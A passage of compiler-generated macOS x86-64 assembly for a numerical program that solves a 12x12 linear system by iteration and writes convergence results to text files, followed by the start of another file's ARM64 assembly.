movq -56(%rbp), %rsi
movl $12, %edx
callq _VectSub
movq %rax, %rdi
movl $12, %esi
callq _FindNorm
movq -112(%rbp), %rdi ## 8-byte Reload
movsd -72(%rbp), %xmm1 ## xmm1 = mem[0],zero
leaq L_.str.7(%rip), %rsi
movb $2, %al
callq _fprintf
movq -40(%rbp), %rdi
callq _free
movq -48(%rbp), %rdi
callq _free
movq -56(%rbp), %rdi
callq _free
movsd -72(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd LCPI13_8(%rip), %xmm1 ## xmm1 = mem[0],zero
divsd %xmm1, %xmm0
movsd %xmm0, -72(%rbp)
jmp LBB13_13
LBB13_19:
movq -16(%rbp), %rdi
callq _fclose
movsd LCPI13_0(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -72(%rbp)
leaq L_.str.8(%rip), %rdi
leaq L_.str.6(%rip), %rsi
callq _fopen
movq %rax, -16(%rbp)
LBB13_20: ## =>This Loop Header: Depth=1
## Child Loop BB13_22 Depth 2
movsd -72(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd LCPI13_1(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jb LBB13_26
## %bb.21: ## in Loop: Header=BB13_20 Depth=1
movq -24(%rbp), %rdi
movl $12, %esi
callq _CreateAlphaMatrix
movq %rax, -40(%rbp)
movq -32(%rbp), %rdi
movq -24(%rbp), %rsi
movl $12, %edx
callq _CreateBetaVector
movq %rax, -48(%rbp)
movq -48(%rbp), %rax
movq %rax, -56(%rbp)
movl $0, -100(%rbp)
LBB13_22: ## Parent Loop BB13_20 Depth=1
## => This Inner Loop Header: Depth=2
movq -64(%rbp), %rdi
movq -56(%rbp), %rsi
movl $12, %edx
callq _VectSub
movq %rax, %rdi
movl $12, %esi
callq _FindNorm
ucomisd -72(%rbp), %xmm0
jbe LBB13_25
## %bb.23: ## in Loop: Header=BB13_22 Depth=2
movq -48(%rbp), %rdi
movq -40(%rbp), %rsi
movq -56(%rbp), %rdx
movl $12, %ecx
callq _CreateXVector
movq %rax, -56(%rbp)
## %bb.24: ## in Loop: Header=BB13_22 Depth=2
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_22
LBB13_25: ## in Loop: Header=BB13_20 Depth=1
movq -16(%rbp), %rax
movq %rax, -120(%rbp) ## 8-byte Spill
movq -24(%rbp), %rdi
movq -56(%rbp), %rsi
movl $12, %edx
callq _MatrixMul
movq %rax, %rdi
movq -32(%rbp), %rsi
movl $12, %edx
callq _VectSub
movq %rax, %rdi
movl $12, %esi
callq _FindNorm
movq -120(%rbp), %rdi ## 8-byte Reload
movsd -72(%rbp), %xmm1 ## xmm1 = mem[0],zero
leaq L_.str.7(%rip), %rsi
movb $2, %al
callq _fprintf
movq -40(%rbp), %rdi
callq _free
movq -48(%rbp), %rdi
callq _free
movq -56(%rbp), %rdi
callq _free
movsd -72(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd LCPI13_8(%rip), %xmm1 ## xmm1 = mem[0],zero
divsd %xmm1, %xmm0
movsd %xmm0, -72(%rbp)
jmp LBB13_20
LBB13_26:
movq -16(%rbp), %rdi
callq _fclose
movsd LCPI13_2(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -72(%rbp)
leaq L_.str.9(%rip), %rdi
leaq L_.str.6(%rip), %rsi
callq _fopen
movq %rax, -16(%rbp)
LBB13_27: ## =>This Loop Header: Depth=1
## Child Loop BB13_29 Depth 2
## Child Loop BB13_33 Depth 2
## Child Loop BB13_35 Depth 3
## Child Loop BB13_41 Depth 2
movq -24(%rbp), %rdi
movl $12, %esi
callq _GetDet
ucomisd -72(%rbp), %xmm0
jbe LBB13_45
## %bb.28: ## in Loop: Header=BB13_27 Depth=1
movq -24(%rbp), %rdi
movl $12, %esi
callq _CreateAlphaMatrix
movq %rax, -40(%rbp)
movq -32(%rbp), %rdi
movq -24(%rbp), %rsi
movl $12, %edx
callq _CreateBetaVector
movq %rax, -48(%rbp)
movq -48(%rbp), %rax
movq %rax, -56(%rbp)
movl $0, -100(%rbp)
LBB13_29: ## Parent Loop BB13_27 Depth=1
## => This Inner Loop Header: Depth=2
movq -64(%rbp), %rdi
movq -56(%rbp), %rsi
movl $12, %edx
callq _VectSub
movq %rax, %rdi
movl $12, %esi
callq _FindNorm
ucomisd -72(%rbp), %xmm0
jbe LBB13_32
## %bb.30: ## in Loop: Header=BB13_29 Depth=2
movq -48(%rbp), %rdi
movq -40(%rbp), %rsi
movq -56(%rbp), %rdx
movl $12, %ecx
callq _CreateXVector
movq %rax, -56(%rbp)
## %bb.31: ## in Loop: Header=BB13_29 Depth=2
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_29
LBB13_32: ## in Loop: Header=BB13_27 Depth=1
movq -16(%rbp), %rax
movq %rax, -136(%rbp) ## 8-byte Spill
movq -64(%rbp), %rdi
movq -56(%rbp), %rsi
movl $12, %edx
callq _VectSub
movq %rax, %rdi
movl $12, %esi
callq _FindNorm
movsd %xmm0, -128(%rbp) ## 8-byte Spill
movq -24(%rbp), %rdi
movl $12, %esi
callq _GetDet
movq -136(%rbp), %rdi ## 8-byte Reload
movaps %xmm0, %xmm1
movsd -128(%rbp), %xmm0 ## 8-byte Reload
## xmm0 = mem[0],zero
leaq L_.str.7(%rip), %rsi
movb $2, %al
callq _fprintf
movq -40(%rbp), %rdi
callq _free
movq -48(%rbp), %rdi
callq _free
movq -56(%rbp), %rdi
callq _free
movl $0, -100(%rbp)
LBB13_33: ## Parent Loop BB13_27 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB13_35 Depth 3
cmpl $12, -100(%rbp)
jge LBB13_40
## %bb.34: ## in Loop: Header=BB13_33 Depth=2
movl $0, -104(%rbp)
LBB13_35: ## Parent Loop BB13_27 Depth=1
## Parent Loop BB13_33 Depth=2
## => This Inner Loop Header: Depth=3
cmpl $12, -104(%rbp)
jge LBB13_38
## %bb.36: ## in Loop: Header=BB13_35 Depth=3
movsd LCPI13_5(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd LCPI13_6(%rip), %xmm1 ## xmm1 = mem[0],zero
callq _pow
movaps %xmm0, %xmm1
movq -24(%rbp), %rax
imull $12, -100(%rbp), %ecx
addl -104(%rbp), %ecx
movslq %ecx, %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
divsd %xmm1, %xmm0
movsd %xmm0, (%rax,%rcx,8)
## %bb.37: ## in Loop: Header=BB13_35 Depth=3
movl -104(%rbp), %eax
addl $1, %eax
movl %eax, -104(%rbp)
jmp LBB13_35
LBB13_38: ## in Loop: Header=BB13_33 Depth=2
jmp LBB13_39
LBB13_39: ## in Loop: Header=BB13_33 Depth=2
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_33
LBB13_40: ## in Loop: Header=BB13_27 Depth=1
movl $0, -100(%rbp)
LBB13_41: ## Parent Loop BB13_27 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $12, -100(%rbp)
jge LBB13_44
## %bb.42: ## in Loop: Header=BB13_41 Depth=2
movsd LCPI13_5(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd LCPI13_6(%rip), %xmm1 ## xmm1 = mem[0],zero
callq _pow
movaps %xmm0, %xmm1
movq -32(%rbp), %rax
movslq -100(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
divsd %xmm1, %xmm0
movsd %xmm0, (%rax,%rcx,8)
## %bb.43: ## in Loop: Header=BB13_41 Depth=2
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_41
LBB13_44: ## in Loop: Header=BB13_27 Depth=1
jmp LBB13_27
LBB13_45:
movq -16(%rbp), %rdi
callq _fclose
movl $0, -100(%rbp)
LBB13_46: ## =>This Loop Header: Depth=1
## Child Loop BB13_48 Depth 2
cmpl $12, -100(%rbp)
jge LBB13_53
## %bb.47: ## in Loop: Header=BB13_46 Depth=1
movl $0, -104(%rbp)
LBB13_48: ## Parent Loop BB13_46 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $12, -104(%rbp)
jge LBB13_51
## %bb.49: ## in Loop: Header=BB13_48 Depth=2
movq -80(%rbp), %rax
imull $12, -100(%rbp), %ecx
addl -104(%rbp), %ecx
movslq %ecx, %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -24(%rbp), %rax
imull $12, -100(%rbp), %ecx
addl -104(%rbp), %ecx
movslq %ecx, %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.50: ## in Loop: Header=BB13_48 Depth=2
movl -104(%rbp), %eax
addl $1, %eax
movl %eax, -104(%rbp)
jmp LBB13_48
LBB13_51: ## in Loop: Header=BB13_46 Depth=1
jmp LBB13_52
LBB13_52: ## in Loop: Header=BB13_46 Depth=1
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_46
LBB13_53:
movl $0, -100(%rbp)
LBB13_54: ## =>This Inner Loop Header: Depth=1
cmpl $12, -100(%rbp)
jge LBB13_57
## %bb.55: ## in Loop: Header=BB13_54 Depth=1
movq -88(%rbp), %rax
movslq -100(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -32(%rbp), %rax
movslq -100(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.56: ## in Loop: Header=BB13_54 Depth=1
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_54
LBB13_57:
movsd LCPI13_2(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -72(%rbp)
leaq L_.str.10(%rip), %rdi
leaq L_.str.6(%rip), %rsi
callq _fopen
movq %rax, -16(%rbp)
LBB13_58: ## =>This Loop Header: Depth=1
## Child Loop BB13_60 Depth 2
## Child Loop BB13_64 Depth 2
## Child Loop BB13_66 Depth 3
## Child Loop BB13_72 Depth 2
movq -24(%rbp), %rdi
movl $12, %esi
callq _GetDet
ucomisd -72(%rbp), %xmm0
jbe LBB13_76
## %bb.59: ## in Loop: Header=BB13_58 Depth=1
movq -24(%rbp), %rdi
movl $12, %esi
callq _CreateAlphaMatrix
movq %rax, -40(%rbp)
movq -32(%rbp), %rdi
movq -24(%rbp), %rsi
movl $12, %edx
callq _CreateBetaVector
movq %rax, -48(%rbp)
movq -48(%rbp), %rax
movq %rax, -56(%rbp)
movl $0, -100(%rbp)
LBB13_60: ## Parent Loop BB13_58 Depth=1
## => This Inner Loop Header: Depth=2
movq -64(%rbp), %rdi
movq -56(%rbp), %rsi
movl $12, %edx
callq _VectSub
movq %rax, %rdi
movl $12, %esi
callq _FindNorm
ucomisd -72(%rbp), %xmm0
jbe LBB13_63
## %bb.61: ## in Loop: Header=BB13_60 Depth=2
movq -48(%rbp), %rdi
movq -40(%rbp), %rsi
movq -56(%rbp), %rdx
movl $12, %ecx
callq _CreateXVector
movq %rax, -56(%rbp)
## %bb.62: ## in Loop: Header=BB13_60 Depth=2
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_60
LBB13_63: ## in Loop: Header=BB13_58 Depth=1
movq -16(%rbp), %rax
movq %rax, -152(%rbp) ## 8-byte Spill
movq -24(%rbp), %rdi
movq -56(%rbp), %rsi
movl $12, %edx
callq _MatrixMul
movq %rax, %rdi
movq -32(%rbp), %rsi
movl $12, %edx
callq _VectSub
movq %rax, %rdi
movl $12, %esi
callq _FindNorm
movsd %xmm0, -144(%rbp) ## 8-byte Spill
movq -24(%rbp), %rdi
movl $12, %esi
callq _GetDet
movq -152(%rbp), %rdi ## 8-byte Reload
movaps %xmm0, %xmm1
movsd -144(%rbp), %xmm0 ## 8-byte Reload
## xmm0 = mem[0],zero
leaq L_.str.7(%rip), %rsi
movb $2, %al
callq _fprintf
movq -40(%rbp), %rdi
callq _free
movq -48(%rbp), %rdi
callq _free
movq -56(%rbp), %rdi
callq _free
movl $0, -100(%rbp)
LBB13_64: ## Parent Loop BB13_58 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB13_66 Depth 3
cmpl $12, -100(%rbp)
jge LBB13_71
## %bb.65: ## in Loop: Header=BB13_64 Depth=2
movl $0, -104(%rbp)
LBB13_66: ## Parent Loop BB13_58 Depth=1
## Parent Loop BB13_64 Depth=2
## => This Inner Loop Header: Depth=3
cmpl $12, -104(%rbp)
jge LBB13_69
## %bb.67: ## in Loop: Header=BB13_66 Depth=3
movsd LCPI13_5(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd LCPI13_6(%rip), %xmm1 ## xmm1 = mem[0],zero
callq _pow
movaps %xmm0, %xmm1
movq -24(%rbp), %rax
imull $12, -100(%rbp), %ecx
addl -104(%rbp), %ecx
movslq %ecx, %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
divsd %xmm1, %xmm0
movsd %xmm0, (%rax,%rcx,8)
## %bb.68: ## in Loop: Header=BB13_66 Depth=3
movl -104(%rbp), %eax
addl $1, %eax
movl %eax, -104(%rbp)
jmp LBB13_66
LBB13_69: ## in Loop: Header=BB13_64 Depth=2
jmp LBB13_70
LBB13_70: ## in Loop: Header=BB13_64 Depth=2
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_64
LBB13_71: ## in Loop: Header=BB13_58 Depth=1
movl $0, -100(%rbp)
LBB13_72: ## Parent Loop BB13_58 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $12, -100(%rbp)
jge LBB13_75
## %bb.73: ## in Loop: Header=BB13_72 Depth=2
movsd LCPI13_5(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd LCPI13_6(%rip), %xmm1 ## xmm1 = mem[0],zero
callq _pow
movaps %xmm0, %xmm1
movq -32(%rbp), %rax
movslq -100(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
divsd %xmm1, %xmm0
movsd %xmm0, (%rax,%rcx,8)
## %bb.74: ## in Loop: Header=BB13_72 Depth=2
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_72
LBB13_75: ## in Loop: Header=BB13_58 Depth=1
jmp LBB13_58
LBB13_76:
movq -16(%rbp), %rdi
callq _fclose
movl $0, -100(%rbp)
LBB13_77: ## =>This Loop Header: Depth=1
## Child Loop BB13_79 Depth 2
cmpl $12, -100(%rbp)
jge LBB13_84
## %bb.78: ## in Loop: Header=BB13_77 Depth=1
movl $0, -104(%rbp)
LBB13_79: ## Parent Loop BB13_77 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $12, -104(%rbp)
jge LBB13_82
## %bb.80: ## in Loop: Header=BB13_79 Depth=2
movq -80(%rbp), %rax
imull $12, -100(%rbp), %ecx
addl -104(%rbp), %ecx
movslq %ecx, %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -24(%rbp), %rax
imull $12, -100(%rbp), %ecx
addl -104(%rbp), %ecx
movslq %ecx, %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.81: ## in Loop: Header=BB13_79 Depth=2
movl -104(%rbp), %eax
addl $1, %eax
movl %eax, -104(%rbp)
jmp LBB13_79
LBB13_82: ## in Loop: Header=BB13_77 Depth=1
jmp LBB13_83
LBB13_83: ## in Loop: Header=BB13_77 Depth=1
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_77
LBB13_84:
movl $0, -100(%rbp)
LBB13_85: ## =>This Inner Loop Header: Depth=1
cmpl $12, -100(%rbp)
jge LBB13_88
## %bb.86: ## in Loop: Header=BB13_85 Depth=1
movq -88(%rbp), %rax
movslq -100(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -32(%rbp), %rax
movslq -100(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.87: ## in Loop: Header=BB13_85 Depth=1
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_85
LBB13_88:
movsd LCPI13_0(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -72(%rbp)
leaq L_.str.11(%rip), %rdi
leaq L_.str.6(%rip), %rsi
callq _fopen
movq %rax, -16(%rbp)
LBB13_89: ## =>This Loop Header: Depth=1
## Child Loop BB13_91 Depth 2
movsd -72(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd LCPI13_1(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jb LBB13_95
## %bb.90: ## in Loop: Header=BB13_89 Depth=1
movq -24(%rbp), %rdi
movl $12, %esi
callq _CreateAlphaMatrix
movq %rax, -40(%rbp)
movq -32(%rbp), %rdi
movq -24(%rbp), %rsi
movl $12, %edx
callq _CreateBetaVector
movq %rax, -48(%rbp)
movq -48(%rbp), %rax
movq %rax, -56(%rbp)
movl $0, -100(%rbp)
LBB13_91: ## Parent Loop BB13_89 Depth=1
## => This Inner Loop Header: Depth=2
movq -64(%rbp), %rdi
movq -56(%rbp), %rsi
movl $12, %edx
callq _VectSub
movq %rax, %rdi
movl $12, %esi
callq _FindNorm
ucomisd -72(%rbp), %xmm0
jbe LBB13_94
## %bb.92: ## in Loop: Header=BB13_91 Depth=2
movq -48(%rbp), %rdi
movq -40(%rbp), %rsi
movq -56(%rbp), %rdx
movl $12, %ecx
callq _CreateXVector
movq %rax, -56(%rbp)
## %bb.93: ## in Loop: Header=BB13_91 Depth=2
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_91
LBB13_94: ## in Loop: Header=BB13_89 Depth=1
movq -16(%rbp), %rdi
movl -100(%rbp), %edx
movsd -72(%rbp), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.12(%rip), %rsi
movb $1, %al
callq _fprintf
movq -40(%rbp), %rdi
callq _free
movq -48(%rbp), %rdi
callq _free
movq -56(%rbp), %rdi
callq _free
movsd -72(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd LCPI13_8(%rip), %xmm1 ## xmm1 = mem[0],zero
divsd %xmm1, %xmm0
movsd %xmm0, -72(%rbp)
jmp LBB13_89
LBB13_95:
movq -16(%rbp), %rdi
callq _fclose
movsd LCPI13_2(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -72(%rbp)
movsd LCPI13_3(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -96(%rbp)
leaq L_.str.13(%rip), %rdi
leaq L_.str.6(%rip), %rsi
callq _fopen
movq %rax, -16(%rbp)
LBB13_96: ## =>This Loop Header: Depth=1
## Child Loop BB13_98 Depth 2
## Child Loop BB13_102 Depth 2
## Child Loop BB13_106 Depth 2
movsd -96(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd LCPI13_4(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jb LBB13_110
## %bb.97: ## in Loop: Header=BB13_96 Depth=1
movq -24(%rbp), %rdi
movl $12, %esi
callq _CreateAlphaMatrix
movq %rax, -40(%rbp)
movq -32(%rbp), %rdi
movq -24(%rbp), %rsi
movl $12, %edx
callq _CreateBetaVector
movq %rax, -48(%rbp)
movl $96, %edi
callq _malloc
movq %rax, -56(%rbp)
movl $0, -100(%rbp)
LBB13_98: ## Parent Loop BB13_96 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $12, -100(%rbp)
jge LBB13_101
## %bb.99: ## in Loop: Header=BB13_98 Depth=2
movq -64(%rbp), %rax
movslq -100(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -56(%rbp), %rax
movslq -100(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.100: ## in Loop: Header=BB13_98 Depth=2
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_98
LBB13_101: ## in Loop: Header=BB13_96 Depth=1
movl $0, -100(%rbp)
LBB13_102: ## Parent Loop BB13_96 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $12, -100(%rbp)
jge LBB13_105
## %bb.103: ## in Loop: Header=BB13_102 Depth=2
movsd -96(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -56(%rbp), %rax
movslq -100(%rbp), %rcx
mulsd (%rax,%rcx,8), %xmm0
movsd %xmm0, (%rax,%rcx,8)
## %bb.104: ## in Loop: Header=BB13_102 Depth=2
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_102
LBB13_105: ## in Loop: Header=BB13_96 Depth=1
movl $0, -100(%rbp)
LBB13_106: ## Parent Loop BB13_96 Depth=1
## => This Inner Loop Header: Depth=2
movq -64(%rbp), %rdi
movq -56(%rbp), %rsi
movl $12, %edx
callq _VectSub
movq %rax, %rdi
movl $12, %esi
callq _FindNorm
ucomisd -72(%rbp), %xmm0
jbe LBB13_109
## %bb.107: ## in Loop: Header=BB13_106 Depth=2
movq -48(%rbp), %rdi
movq -40(%rbp), %rsi
movq -56(%rbp), %rdx
movl $12, %ecx
callq _CreateXVector
movq %rax, -56(%rbp)
## %bb.108: ## in Loop: Header=BB13_106 Depth=2
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_106
LBB13_109: ## in Loop: Header=BB13_96 Depth=1
movq -16(%rbp), %rdi
movl -100(%rbp), %edx
movsd -96(%rbp), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.12(%rip), %rsi
movb $1, %al
callq _fprintf
movq -40(%rbp), %rdi
callq _free
movq -48(%rbp), %rdi
callq _free
movq -56(%rbp), %rdi
callq _free
movsd -96(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd LCPI13_7(%rip), %xmm1 ## xmm1 = mem[0],zero
divsd %xmm1, %xmm0
movsd %xmm0, -96(%rbp)
jmp LBB13_96
LBB13_110:
movq -16(%rbp), %rdi
callq _fclose
movsd LCPI13_2(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -72(%rbp)
leaq L_.str.14(%rip), %rdi
leaq L_.str.6(%rip), %rsi
callq _fopen
movq %rax, -16(%rbp)
LBB13_111: ## =>This Loop Header: Depth=1
## Child Loop BB13_113 Depth 2
## Child Loop BB13_117 Depth 2
## Child Loop BB13_119 Depth 3
## Child Loop BB13_125 Depth 2
movq -24(%rbp), %rdi
movl $12, %esi
callq _GetDet
ucomisd -72(%rbp), %xmm0
jbe LBB13_129
## %bb.112: ## in Loop: Header=BB13_111 Depth=1
movq -24(%rbp), %rdi
movl $12, %esi
callq _CreateAlphaMatrix
movq %rax, -40(%rbp)
movq -32(%rbp), %rdi
movq -24(%rbp), %rsi
movl $12, %edx
callq _CreateBetaVector
movq %rax, -48(%rbp)
movq -48(%rbp), %rax
movq %rax, -56(%rbp)
movl $0, -100(%rbp)
LBB13_113: ## Parent Loop BB13_111 Depth=1
## => This Inner Loop Header: Depth=2
movq -64(%rbp), %rdi
movq -56(%rbp), %rsi
movl $12, %edx
callq _VectSub
movq %rax, %rdi
movl $12, %esi
callq _FindNorm
ucomisd -72(%rbp), %xmm0
jbe LBB13_116
## %bb.114: ## in Loop: Header=BB13_113 Depth=2
movq -48(%rbp), %rdi
movq -40(%rbp), %rsi
movq -56(%rbp), %rdx
movl $12, %ecx
callq _CreateXVector
movq %rax, -56(%rbp)
## %bb.115: ## in Loop: Header=BB13_113 Depth=2
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_113
LBB13_116: ## in Loop: Header=BB13_111 Depth=1
movq -16(%rbp), %rax
movq %rax, -168(%rbp) ## 8-byte Spill
movl -100(%rbp), %eax
movl %eax, -156(%rbp) ## 4-byte Spill
movq -24(%rbp), %rdi
movl $12, %esi
callq _GetDet
movq -168(%rbp), %rdi ## 8-byte Reload
movl -156(%rbp), %edx ## 4-byte Reload
leaq L_.str.12(%rip), %rsi
movb $1, %al
callq _fprintf
movq -40(%rbp), %rdi
callq _free
movq -48(%rbp), %rdi
callq _free
movq -56(%rbp), %rdi
callq _free
movl $0, -100(%rbp)
LBB13_117: ## Parent Loop BB13_111 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB13_119 Depth 3
cmpl $12, -100(%rbp)
jge LBB13_124
## %bb.118: ## in Loop: Header=BB13_117 Depth=2
movl $0, -104(%rbp)
LBB13_119: ## Parent Loop BB13_111 Depth=1
## Parent Loop BB13_117 Depth=2
## => This Inner Loop Header: Depth=3
cmpl $12, -104(%rbp)
jge LBB13_122
## %bb.120: ## in Loop: Header=BB13_119 Depth=3
movsd LCPI13_5(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd LCPI13_6(%rip), %xmm1 ## xmm1 = mem[0],zero
callq _pow
movaps %xmm0, %xmm1
movq -24(%rbp), %rax
imull $12, -100(%rbp), %ecx
addl -104(%rbp), %ecx
movslq %ecx, %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
divsd %xmm1, %xmm0
movsd %xmm0, (%rax,%rcx,8)
## %bb.121: ## in Loop: Header=BB13_119 Depth=3
movl -104(%rbp), %eax
addl $1, %eax
movl %eax, -104(%rbp)
jmp LBB13_119
LBB13_122: ## in Loop: Header=BB13_117 Depth=2
jmp LBB13_123
LBB13_123: ## in Loop: Header=BB13_117 Depth=2
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_117
LBB13_124: ## in Loop: Header=BB13_111 Depth=1
movl $0, -100(%rbp)
LBB13_125: ## Parent Loop BB13_111 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $12, -100(%rbp)
jge LBB13_128
## %bb.126: ## in Loop: Header=BB13_125 Depth=2
movsd LCPI13_5(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd LCPI13_6(%rip), %xmm1 ## xmm1 = mem[0],zero
callq _pow
movaps %xmm0, %xmm1
movq -32(%rbp), %rax
movslq -100(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
divsd %xmm1, %xmm0
movsd %xmm0, (%rax,%rcx,8)
## %bb.127: ## in Loop: Header=BB13_125 Depth=2
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_125
LBB13_128: ## in Loop: Header=BB13_111 Depth=1
jmp LBB13_111
LBB13_129:
movq -16(%rbp), %rdi
callq _fclose
movl $0, -100(%rbp)
LBB13_130: ## =>This Loop Header: Depth=1
## Child Loop BB13_132 Depth 2
cmpl $12, -100(%rbp)
jge LBB13_137
## %bb.131: ## in Loop: Header=BB13_130 Depth=1
movl $0, -104(%rbp)
LBB13_132: ## Parent Loop BB13_130 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $12, -104(%rbp)
jge LBB13_135
## %bb.133: ## in Loop: Header=BB13_132 Depth=2
movq -80(%rbp), %rax
imull $12, -100(%rbp), %ecx
addl -104(%rbp), %ecx
movslq %ecx, %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -24(%rbp), %rax
imull $12, -100(%rbp), %ecx
addl -104(%rbp), %ecx
movslq %ecx, %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.134: ## in Loop: Header=BB13_132 Depth=2
movl -104(%rbp), %eax
addl $1, %eax
movl %eax, -104(%rbp)
jmp LBB13_132
LBB13_135: ## in Loop: Header=BB13_130 Depth=1
jmp LBB13_136
LBB13_136: ## in Loop: Header=BB13_130 Depth=1
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_130
LBB13_137:
movl $0, -100(%rbp)
LBB13_138: ## =>This Inner Loop Header: Depth=1
cmpl $12, -100(%rbp)
jge LBB13_141
## %bb.139: ## in Loop: Header=BB13_138 Depth=1
movq -88(%rbp), %rax
movslq -100(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -32(%rbp), %rax
movslq -100(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.140: ## in Loop: Header=BB13_138 Depth=1
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB13_138
LBB13_141:
xorl %eax, %eax
addq $176, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%lf\n"
.section __TEXT,__const
l_.str.1: ## @.str.1
.space 2
.section __TEXT,__cstring,cstring_literals
L_.str.2: ## @.str.2
.asciz "%lf"
L_.str.3: ## @.str.3
.asciz "%lf "
L_.str.4: ## @.str.4
.asciz "\n"
L_.str.5: ## @.str.5
.asciz "../Dependings1.txt"
L_.str.6: ## @.str.6
.asciz "w"
L_.str.7: ## @.str.7
.asciz "%.15lf %.15lf\n"
L_.str.8: ## @.str.8
.asciz "../Dependings2.txt"
L_.str.9: ## @.str.9
.asciz "../Dependings3.txt"
L_.str.10: ## @.str.10
.asciz "../Dependings4.txt"
L_.str.11: ## @.str.11
.asciz "../Dependings5.txt"
L_.str.12: ## @.str.12
.asciz "%i %.15lf\n"
L_.str.13: ## @.str.13
.asciz "../Dependings6.txt"
L_.str.14: ## @.str.14
.asciz "../Dependings7.txt"
.subsections_via_symbols
| the_stack_data/70449534.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 16
mov x29, sp
